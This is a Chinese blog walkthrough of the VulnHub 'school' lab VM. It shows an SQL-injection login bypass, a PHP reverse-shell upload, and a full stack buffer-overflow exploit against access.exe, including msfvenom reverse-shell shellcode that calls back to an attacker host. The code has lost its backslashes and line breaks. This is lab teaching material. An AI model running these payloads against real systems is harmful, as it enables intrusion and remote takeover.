靶机实战系列之school靶机

admin
admin
admin
138674
文章
114
评论
2024年10月21日17:08:09评论25 views字数 11278阅读37分35秒阅读模式



声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 


靶机地址:

https://download.vulnhub.com/school/school.ova.gz


内容简介:

主机发现

端口扫描

信息收集

SQL注入

信息泄漏

文件上传

离线密码破解

在线密码破解

WINE

缓冲区溢出

EXP代码编写

本地提权

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之school靶机


1.2 端口扫描

nmap -p-  192.168.144.244

靶机实战系列之school靶机


1.3 信息搜集

nmap  -p22,23,80  -A  192.168.144.244


Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-01 01:17 EDTNmap scan report for 192.168.144.244Host is up (0.00068s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: |   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)23/tcp open  telnet?| fingerprint-strings: |   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns, tn3270: |_    Verification Code:80/tcp open  http    Apache httpd 2.4.38 ((Debian))| http-title: 404 Not Found|_Requested resource was login.php|_http-server-header: Apache/2.4.38 (Debian)1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port23-TCP:V=7.92%I=7%D=11/1%Time=6360ABFE%P=x86_64-pc-linux-gnu%r(NULLSF:,1C,"Verificationx20Code:nxeex1e@xe2x1c")%r(GenericLines,SF:1C,"Verificationx20Code:nxeex1e@xe2x1c")%r(tn3270,1C,"VerSF:ificationx20Code:nxeex1e@xe2x1c")%r(GetRequest,1C,"VerifiSF:cationx20Code:nxeex1e@xe2x1c")%r(HTTPOptions,1C,"VerificaSF:tionx20Code:nxeex1e@xe2x1c")%r(RTSPRequest,1C,"VerificatiSF:onx20Code:nxeex1e@xe2x1c")%r(RPCCheck,1C,"Verificationx2SF:0Code:nxeex1e@xe2x1c")%r(DNSVersionBindReqTCP,1C,"VerificaSF:tionx20Code:nxeex1e@xe2x1c")%r(DNSStatusRequestTCP,1C,"VeSF:rificationx20Code:nxeex1e@xe2x1c")%r(Help,1C,"VerificatioSF:nx20Code:nxeex1e@xe2x1c")%r(SSLSessionReq,1C,"VerificatioSF:nx20Code:nxeex1e@xe2x1c")%r(TerminalServerCookie,1C,"VeriSF:ficationx20Code:nxeex1e@xe2x1c")%r(TLSSessionReq,1C,"VeriSF:ficationx20Code:nxeex1e@xe2x1c")%r(Kerberos,1C,"VerificatSF:ionx20Code:nxeex1e@xe2x1c")%r(SMBProgNeg,1C,"VerificationSF:x20Code:nxeex1e@xe2x1c")%r(X11Probe,1C,"Verificationx20CSF:ode:nxeex1e@xe2x1c")%r(FourOhFourRequest,1C,"VerificationSF:x20Code:nxeex1e@xe2x1c")%r(LPDString,1C,"Verificationx20CSF:ode:nxeex1e@xe2x1c")%r(LDAPSearchReq,1C,"Verificationx20CSF:ode:nxeex1e@xe2x1c")%r(LDAPBindReq,1C,"Verificationx20CodSF:e:nxeex1e@xe2x1c")%r(SIPOptions,1C,"Verificationx20Code:SF:nxeex1e@xe2x1c")%r(LANDesk-RC,1C,"Verificationx20Code:nSF:xeex1e@xe2x1c")%r(TerminalServer,1C,"Verificationx20Code:nSF:0xeex1e@xe2x1c")%r(NCP,1C,"Verificationx20Code:nxeeSF:x1e@xe2x1c")%r(NotesRPC,1C,"Verificationx20Code:nxeex1e@SF:0xe2x1c")%r(JavaRMI,1C,"Verificationx20Code:nxeex1e@xe2SF:x1c")%r(WMSRequest,1C,"Verificationx20Code:nxeex1e@xe2x1cSF:")%r(oracle-tns,1C,"Verificationx20Code:nxeex1e@xe2x1c")%SF:r(ms-sql-s,1C,"Verificationx20Code:nxeex1e@xe2x1c")%r(afpSF:,1C,"Verificationx20Code:nxeex1e@xe2x1c");MAC Address: 08:00:27:07:C2:39 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTEHOP RTT     ADDRESS1   0.68 ms 192.168.144.244
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.54 seconds


1.4 登陆界面(进入)


http://192.168.144.244/student_attendance/login.php

靶机实战系列之school靶机


1.5 SQL注入

账户:1'or 1=1 -- 密码:     任意

靶机实战系列之school靶机

登陆进入


1.6 文件上传


通过源代码检测

view-source:http://192.168.144.244/student_attendance/index.php

靶机实战系列之school靶机

暴露接口,存在文件上传的路径

assets/uploads/1604743980_shell.phphttp://192.168.144.244/student_attendance/index.php?page=site_settings

发现文件上传接口

靶机实战系列之school靶机

cp  /usr/share/webshells/php/php-reverse-shell.php .mv  php-reverse-shell.php s.phpvim s.php                  //修改 ip

靶机实战系列之school靶机

文件上传

靶机实战系列之school靶机

访问

http://192.168.144.244/student_attendance/assets/uploads/

靶机实战系列之school靶机

文件上传成功,在kali上起监听1234端口

点击php文件,反弹shell成功

升级终端python -c "import pty;pty.spawn('/bin/bash')"


1.7 WINE


cd /rootls -la
total 36drwxr-xr-x  4 root root 4096 Nov  7  2020 .drwxr-xr-x 18 root root 4096 Nov  3  2020 ..lrwxrwxrwx  1 root root    9 Nov  7  2020 .bash_history -> /dev/null-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc-rw-r--r--  1 root root  148 Aug 17  2015 .profiledrwx------  2 root root 4096 Oct 27  2020 .ssh-rw-------  1 root root  764 Nov  7  2020 .viminfodrwxr-xr-x  4 root root 4096 Nov  1 05:10 .wine      //发现了 wine -rw-------  1 root root   33 Nov  7  2020 proof.txt-rwxr-xr-x  1 root root   61 Nov  3  2020 win     //程序
cd  .wine

靶机实战系列之school靶机

存在win程序

靶机实战系列之school靶机

ps -ef     正在运行  win  和   access.exe  进程

靶机实战系列之school靶机

发现access,启动23端口    


1.8 缓冲区溢出


准备环境

ImmunityDebugger_1_85_setup  https://debugger.immunityinc.commona.py                      https://github.com/corelan/monaaccess.exe                   靶机下载  /opt/access/funcs_access.dll             靶机下载  /opt/access/
nc  192.168.144.247 4444 < access.exe  -w 1nc -lvnp 4444 > access.exe nc  192.168.144.247 4444 < funcs_access.dll  -w 1nc -lvnp 4444 > funcs_access.dll

靶机实战系列之school靶机

安装 ImmunityDebugger    

安装脚本  

Immunity DebuggerPyCommands   

把mona文件放置到该目录下 

靶机实战系列之school靶机

靶机实战系列之school靶机

准备完成开始干

首先查看端口  

netstat  -ano

靶机实战系列之school靶机

执行软件   

.access.exe

靶机实战系列之school靶机

23端口开放

靶机实战系列之school靶机

正常启动ImmunityDebugger

靶机实战系列之school靶机

打开应用程序点击箭头,让程序运行直到不在发生变化为止。

靶机实战系列之school靶机

测试脚本  发送 2000个A
#!/usr/bin/pythonimport sysimport socketfrom time import sleeptry:    buffer = 'A' * 2000    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(("192.168.144.100",23))     //ip 为  win 主机ip    s.send(buffer)
    s.close()    print("12345")except:    print("hello")

靶机实战系列之school靶机

成功

靶机实战系列之school靶机

程序崩溃了,存在缓冲区溢出漏洞

重新启动ImmunityDebugger 

#!/usr/bin/pythonimport sysimport socketfrom time import sleeptry:    buffer = 'A' * 1902 + 'B' * 4 +"C"* 100    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(("192.168.144.100",23))    s.send(buffer)
    s.close()    print("12345")except:    print("hello")

靶机实战系列之school靶机

又崩溃了但是已经精准找到崩溃的位置,那4个B以及100个C执行shellcode

4个B的位置放入JMP ESP  

100个C 的位置放入shellcode 

第一步

寻址JMP ESP

!mona modules   

去寻找读取access文件的模块

发现两个特征为false 

靶机实战系列之school靶机

!mona find -s "xffxe4" -m "funcs_access.dll"  去找 内存地址 每次启动执行不变   JMP ESP  地址

靶机实战系列之school靶机

0x625012d0   0x625012dd   两个地址  为   JMP  ESP

第二步

测定坏字符

如果使用python3,必须指明数据类型是字节型,传输的payload最好是单行,或者是使用加号多行拼接

如果使用python2,数据类型随便,单行或者多行随便。

#!/usr/bin/pythonimport sysimport socketfrom time import sleep

try:  badchars = (  "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"  "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"  "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"  "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"  "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"  "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"  "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"  "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"  "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"  "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"  "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"  "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"  "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"  "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"  "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"  "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff" )
  buffer = 'A' * 1902 + 'B' * 4 +badchars  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect(("192.168.144.100",23))  s.send(buffer)  s.close()  print("ndone")except:  print("12345")

靶机实战系列之school靶机

测试坏字符代码

先找到ESP,右键-----Follow in Dump看左下角,分析坏字符

靶机实战系列之school靶机

发现在4D处为坏字符不识别

靶机实战系列之school靶机

故修改代码周而复始,所有坏字符从字符集里面删除坏字符即可 !!!!例如 /x4d是坏掉的,删除它即可以下代码已删除可查看
#!/usr/bin/pythonimport sysimport socketfrom time import sleep

try:  badchars = (  "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"  "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"  "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"  "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"  "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4ex4fx50"  "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"  "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"  "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"  "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"  "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"  "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"  "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"  "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"  "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"  "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"  "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff" )
  buffer = 'A' * 1902 + 'B' * 4 +badchars  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect(("192.168.144.100",23))  s.send(buffer)  s.close()  print("ndone")except:  print("12345")

总共有x4dx4fx5fx79x7ex7f有这么多

第三步

注入payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.144.247 LPORT=4444  -f c -b "x00x4dx4fx5fx79x7ex7f"    EXITFUNC=thread

生成shellcode

靶机实战系列之school靶机

"x2bxc9x83xe9xafxe8xffxffxffxffxc0x5ex81x76x0e""xb6xebxcaxa1x83xeexfcxe2xf4x4ax03x48xa1xb6xeb""xaax28x53xdax0axc5x3dxbbxfax2axe4xe7x41xf3xa2""x60xb8x89xb9x5cx80x87x87x14x66x9dxd7x97xc8x8d""x96x2ax05xacxb7x2cx28x53xe4xbcx41xf3xa6x60x80""x9dx3dxa7xdbxd9x55xa3xcbx70xe7x60x93x81xb7x38""x41xe8xaex08xf0xe8x3dxdfx41xa0x60xdax35x0dx77""x24xc7xa0x71xd3x2axd4x40xe8xb7x59x8dx96xeexd4""x52xb3x41xf9x92xeax19xc7x3dxe7x81x2axeexf7xcb""x72x3dxefx41xa0x66x62x8ex85x92xb0x91xc0xefxb1""x9bx5ex56xb4x95xfbx3dxf9x21x2cxebx83xf9x93xb6""xebxa2xd6xc5xd9x95xf5xdexa7xbdx87xb1x14x1fx19""x26xeaxcaxa1x9fx2fx9exf1xdexc2x4axcaxb6x14x1f""xf1xe6xbbx9axe1xe6xabx9axc9x5cxe4x15x41x49x3e""x5dxcbxb3x83x0ax09x26x1cxa2xa3xb6xfax96x28x50""x81xdaxf7xe1x83x53x04xc2x8ax35x74x33x2bxbexad""x49xa5xc2xd4x5ax83x3ax14x14xbdx35x74xdex88xa7""xc5xb6x62x29xf6xe1xbcxfbx57xdcxf9x93xf7x54x16""xacx66xf2xcfxf6xa0xb7x66x8ex85xa6x2dxcaxe5xe2""xbbx9cxf7xe0xadx9cxefxe0xbdx99xf7xdex92x06x9e""x30x14x1fx28x56xa5x9cxe7x49xdbxa2xa9x31xf6xaa""x5ex63x50x2axbcx9cxe1xa2x07x23x56x57x5ex63xd7""xccxddxbcx6bx31x41xc3xeex71xe6xa5x99xa5xcbxb6""xb8x35x74"
最终攻击代码如下:请参考
#!/usr/bin/pythonimport sysimport socketfrom time import sleep// x4dx4fx5fx79x7ex7f 坏字符//  0x625012dd 为  JMP  ESP
try:  shellcode = (  "x2bxc9x83xe9xafxe8xffxffxffxffxc0x5ex81x76x0e"  "xb6xebxcaxa1x83xeexfcxe2xf4x4ax03x48xa1xb6xeb"  "xaax28x53xdax0axc5x3dxbbxfax2axe4xe7x41xf3xa2"  "x60xb8x89xb9x5cx80x87x87x14x66x9dxd7x97xc8x8d"  "x96x2ax05xacxb7x2cx28x53xe4xbcx41xf3xa6x60x80"  "x9dx3dxa7xdbxd9x55xa3xcbx70xe7x60x93x81xb7x38"  "x41xe8xaex08xf0xe8x3dxdfx41xa0x60xdax35x0dx77"  "x24xc7xa0x71xd3x2axd4x40xe8xb7x59x8dx96xeexd4"  "x52xb3x41xf9x92xeax19xc7x3dxe7x81x2axeexf7xcb"  "x72x3dxefx41xa0x66x62x8ex85x92xb0x91xc0xefxb1"  "x9bx5ex56xb4x95xfbx3dxf9x21x2cxebx83xf9x93xb6"  "xebxa2xd6xc5xd9x95xf5xdexa7xbdx87xb1x14x1fx19"  "x26xeaxcaxa1x9fx2fx9exf1xdexc2x4axcaxb6x14x1f"  "xf1xe6xbbx9axe1xe6xabx9axc9x5cxe4x15x41x49x3e"  "x5dxcbxb3x83x0ax09x26x1cxa2xa3xb6xfax96x28x50"  "x81xdaxf7xe1x83x53x04xc2x8ax35x74x33x2bxbexad"  "x49xa5xc2xd4x5ax83x3ax14x14xbdx35x74xdex88xa7"  "xc5xb6x62x29xf6xe1xbcxfbx57xdcxf9x93xf7x54x16"  "xacx66xf2xcfxf6xa0xb7x66x8ex85xa6x2dxcaxe5xe2"  "xbbx9cxf7xe0xadx9cxefxe0xbdx99xf7xdex92x06x9e"  "x30x14x1fx28x56xa5x9cxe7x49xdbxa2xa9x31xf6xaa"  "x5ex63x50x2axbcx9cxe1xa2x07x23x56x57x5ex63xd7"  "xccxddxbcx6bx31x41xc3xeex71xe6xa5x99xa5xcbxb6"  "xb8x35x74"  )  
  buffer = 'A' * 1902 + "xddx12x50x62" + "x90" *32 +  shellcode  //x90为空更好执行命令    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect(("192.168.144.244",23))    s.send(buffer)    s.close()  print("ndone")except:  print("12345")

起监听端口4444

靶机实战系列之school靶机

成功


1.8 小计


终于成功了,最令我烦恼的就是shellcode尤其是坏字符

这台靶机折磨人, 准备环境!

不懂得命令

坏字符的重复!!!折磨人心





注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"





靶机实战系列之school靶机
点击上方公众号
靶机实战系列之school靶机
关注我们
靶机实战系列之school靶机








往期精彩

Armitage|MSF图形界面神器

原创|Searchall3.5.8敏感信息搜索工具

快看!渗透测试工具库!







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

4、公众号后台回复:验证码,获取验证码工具下载链接。

5.公众号后台回复:应急响应,获取应急响应网盘下载链接。

6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。

7.公众号点菜单栏"工具合集",后台回复""即可获取!

原文始发于微信公众号(嗨嗨安全):靶机实战系列之school靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日17:08:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之school靶机https://cn-sec.com/archives/3295977.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息